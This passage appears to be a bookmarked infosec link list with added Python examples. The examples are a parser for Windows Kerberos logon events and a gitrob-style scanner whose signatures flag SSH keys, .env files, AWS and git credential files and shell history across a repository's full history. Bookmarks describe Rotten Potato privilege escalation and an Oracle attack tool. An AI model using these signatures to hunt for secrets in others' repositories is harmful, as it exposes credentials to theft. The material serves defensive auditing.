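def parse_4768(text: str) -> List[Dict[str, str]]:
    events = []
    for block in text.split("\n---\n"):
        fields = dict(FIELD_RE.findall(block))
        if {"TimeCreated", "Account Name", "Client Address", "Result Code"} <= set(fields):
            fields["Client Address"] = fields["Client Address"].replace("::ffff:", "")  # strip IPv4-mapped prefix
            events.append(fields)
    return events


def logon_history(events: List[Dict[str, str]],
                  exclude_ips: Iterable[str] = ()) -> Dict[str, List[Dict[str, Optional[str]]]]:
    """user -> [{time, ip, computer}] for successful TGT requests, with the
    computer name resolved from the machine account seen at the same address."""
    exclude = set(exclude_ips)
    computer_by_ip = {e["Client Address"]: e["Account Name"].rstrip("$")
                      for e in events if e["Account Name"].endswith("$")}
    history: Dict[str, List[Dict[str, Optional[str]]]] = defaultdict(list)
    for e in events:
        user, ip = e["Account Name"], e["Client Address"]
        if user.endswith("$") or e["Result Code"] != "0x0" or ip in exclude:
            continue
        history[user].append({"time": e["TimeCreated"], "ip": ip, "computer": computer_by_ip.get(ip)})
    return dict(history)


def last_logon(history: Dict[str, List[Dict[str, Optional[str]]]]) -> Dict[str, str]:
    return {user: max(entry["time"] for entry in entries) for user, entries in history.items()}


if __name__ == "__main__":
    hist = logon_history(parse_4768(SAMPLE_4768), exclude_ips=EXCHANGE_SERVER_IPS)
    for user, entries in hist.items():
        for entry in entries:
            print(f"{entry['time']}  {user:8} {entry['ip']:14} {entry['computer'] or '?'}")
```

Without the exclusion, alice would appear to log on from 10.10.0.50; that entry is the Exchange server authenticating on her behalf, which is the noise the script's description warns about.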
AnonOpsecPrivacy - InfoSec Reference
Colossal InfoSec reference on every subject imaginable
security  pentest 
august 2018 by whip_lash
Rotten Potato | Penetration Testing Lab
However there is a technique which can be used that tries to trick the “NT Authority\System” account to negotiate and authenticate via NTLM locally so the token for the “NT Authority\System” account would become available and therefore privilege escalation possible. This technique is called Rotten Potato and it was introduced in DerbyCon 2016 by Stephen Breen and Chris Mallz.
windows  privesc  privilegeescalation  pentest  security 
august 2018 by whip_lash
GitHub - quentinhardy/odat: ODAT: Oracle Database Attacking Tool
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.
oracle  database  pentest  security  tool 
august 2018 by whip_lash
NSA Cracked Open Encrypted Networks of Russian Airlines, Al Jazeera, and Other “High Potential” Targets
The NSA’s ability to crack into sensitive VPNs belonging to large organizations, all the way back in 2006, raises broader questions about the security of such networks. Many consumers pay for access to VPNs in order to mask the origin of their internet traffic from the sites they visit, hide their surfing habits from their internet service providers, and to protect against eavesdroppers on public Wi-Fi networks.
security  nsa  vpn 
august 2018 by whip_lash
Veritas® Traveller's Doorstop - Lee Valley Tools
To use it, you just slide the wedge under the door and elevate it with the screw until the door is solidly wedged. Anyone attempting entry causes the door to wedge tighter in the frame while the pointed screw keeps the wedge from shifting. The screw can be used with concrete subfloors as well as the traditional carpet-covered subfloors.

It does not damage carpeting unless there is an attempted forced entry; it then penetrates the subfloor as the pressure on the wedge increases. But then, which would you prefer, a dent in the subfloor or an unwanted visitor? The lever handle gives you substantial mechanical advantage, making it easy to turn the screw.
security  travel 
august 2018 by whip_lash
michenriksen/gitrob: Reconnaissance tool for GitHub organizations
Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
git  github  osint  security 
august 2018 by whip_lash
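Gitrob's value is the signature list applied to every path that ever existed in the history, not just the current tree. The block below is an added example, not gitrob's code: a small signature set in the shape of its signatures.json (part, type, pattern, caption), a matcher run over a constructed file list, and a helper that feeds it every path from `git log --all --name-only` when a real repository is at hand.

```python
"""Flag sensitive file paths the way gitrob's signatures do.
Added example; SIGNATURES and CONSTRUCTED_TREE are the author's, not gitrob's."""
import os
import re
import subprocess
from typing import Iterable, List, Set, Tuple

SIGNATURES = [
    {"part": "filename", "type": "match", "pattern": "id_rsa", "caption": "Private SSH key"},
    {"part": "filename", "type": "match", "pattern": ".env", "caption": "Environment file, often holds secrets"},
    {"part": "filename", "type": "regex", "pattern": r"^\.?(bash|zsh|sh)_history$", "caption": "Shell command history"},
    {"part": "extension", "type": "match", "pattern": "pem", "caption": "PEM file, may hold a private key"},
    {"part": "extension", "type": "match", "pattern": "pfx", "caption": "PKCS#12 keystore"},
    {"part": "path", "type": "regex", "pattern": r"(^|/)\.aws/credentials$", "caption": "AWS CLI credentials file"},
    {"part": "path", "type": "regex", "pattern": r"(^|/)\.git-credentials$", "caption": "Stored git credentials"},
]

# Constructed file list standing in for a repository's history.
CONSTRUCTED_TREE = [
    "src/app.py", "config/.env", "deploy/keys/id_rsa", "deploy/keys/id_rsa.pub",
    "certs/server.pem", "docs/README.md", ".aws/credentials", "home/.bash_history",
    "ops/secrets.pem.example",
]


def _parts(path: str) -> dict:
    filename = os.path.basename(path)
    # A leading dot is not an extension separator: ".env" has no extension.
    ext = filename.rsplit(".", 1)[1].lower() if "." in filename[1:] else ""
    return {"path": path, "filename": filename, "extension": ext}


def scan_paths(paths: Iterable[str]) -> List[Tuple[str, str]]:
    """(path, caption) for every path hitting a signature; first hit wins."""
    hits = []
    for path in paths:
        parts = _parts(path)
        for sig in SIGNATURES:
            subject = parts[sig["part"]]
            if sig["type"] == "match":
                matched = subject == sig["pattern"]
            else:
                matched = re.search(sig["pattern"], subject) is not None
            if matched:
                hits.append((path, sig["caption"]))
                break
    return hits


def paths_from_history(repo_dir: str) -> Set[str]:
    """Every path touched by any commit on any ref, deleted files included,
    which is where 'removed' credentials still live."""
    out = subprocess.run(["git", "-C", repo_dir, "log", "--all", "--name-only", "--pretty=format:"],
                         capture_output=True, text=True, check=True).stdout
    return {line.strip() for line in out.splitlines() if line.strip()}


if __name__ == "__main__":
    for path, caption in scan_paths(CONSTRUCTED_TREE):
        print(f"{caption:40} {path}")
```

Matching on names catches what the excerpt describes, files that look sensitive; pairing it with a content scan (for example for `-----BEGIN` blocks or AKIA-prefixed AWS key IDs) is the usual next step once a hit is confirmed.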